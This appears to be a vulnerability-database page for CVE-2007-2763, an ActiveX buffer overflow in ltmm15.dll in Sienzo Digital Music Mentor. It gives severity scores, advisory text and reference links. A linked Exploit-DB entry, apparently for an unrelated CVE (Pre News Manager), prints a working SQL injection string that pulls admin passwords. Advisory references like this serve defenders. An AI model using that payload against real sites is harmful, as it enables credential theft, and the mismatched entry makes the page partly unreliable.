CVE-2007-2763
published 2007-05-18CVE-2007-2763: Buffer overflow in the UnlockSupport function in the LockModules subsystem in a certain ActiveX control in ltmm15.dll in Sienzo Digital Music Mentor (DMM)…
PriorityP345critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
7.76%
93.9th percentile
Buffer overflow in the UnlockSupport function in the LockModules subsystem in a certain ActiveX control in ltmm15.dll in Sienzo Digital Music Mentor (DMM) 2.6.0.4 allows remote attackers to execute arbitrary code via a long string in the second argument, a different issue than CVE-2007-2564.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sienzo | digital_music_mentor | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow
exploitdb·2007-05-17
CVE-2007-2763 LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow
LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow
---
source: https://www.securityfocus.com/bid/24035/info
LEADTOOLS Multimedia is prone to a stack-based buffer-overflow vulnerability because the software fails to adequately check boundaries on data supplied to an ActiveX control method.
An attacker can exploit this issue to execute arbitrary code in the context of a user running the application. Failed attempts will likely result in denial-of-service conditions.
LEADTOOLS Multimedia 15 is vulnerable; other versions may also be affected.
NOTE: The 'Ltmm15.dll' ActiveX control is included in Digital Music Mentor 2.6.0.4. Other applications may also include the ActiveX control.
Sienzo Digital Music Mentor (DMM) 2.6.0.4 (ltmm15.dll) Buffer Overflow
Exploit
ur
Exploit-DB
Pre News Manager 1.0 - SQL Injection
exploitdb·2007-05-03
CVE-2006-2763 Pre News Manager 1.0 - SQL Injection
Pre News Manager 1.0 - SQL Injection
---
Pre News Manager v1.0 Remote SQL Injection
Found: Cyber-Security.org
Script site: http://www.preproject.com/news.asp
Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*
Example: http://www.preproject.com/news%20manager/
# milw0rm.com [2007-05-03]
No writeups or analysis indexed.
http://moaxb.blogspot.com/2007/05/moaxb-17-sienzo-digital-music-mentor.htmlhttp://osvdb.org/36025http://shinnai.altervista.org/viewtopic.php?id=42&t_id=19http://www.securityfocus.com/bid/24035http://www.shinnai.altervista.org/moaxb/20070517/sienzo2txt.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/34353http://moaxb.blogspot.com/2007/05/moaxb-17-sienzo-digital-music-mentor.htmlhttp://osvdb.org/36025http://shinnai.altervista.org/viewtopic.php?id=42&t_id=19http://www.securityfocus.com/bid/24035http://www.shinnai.altervista.org/moaxb/20070517/sienzo2txt.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/34353
2007-05-18
Published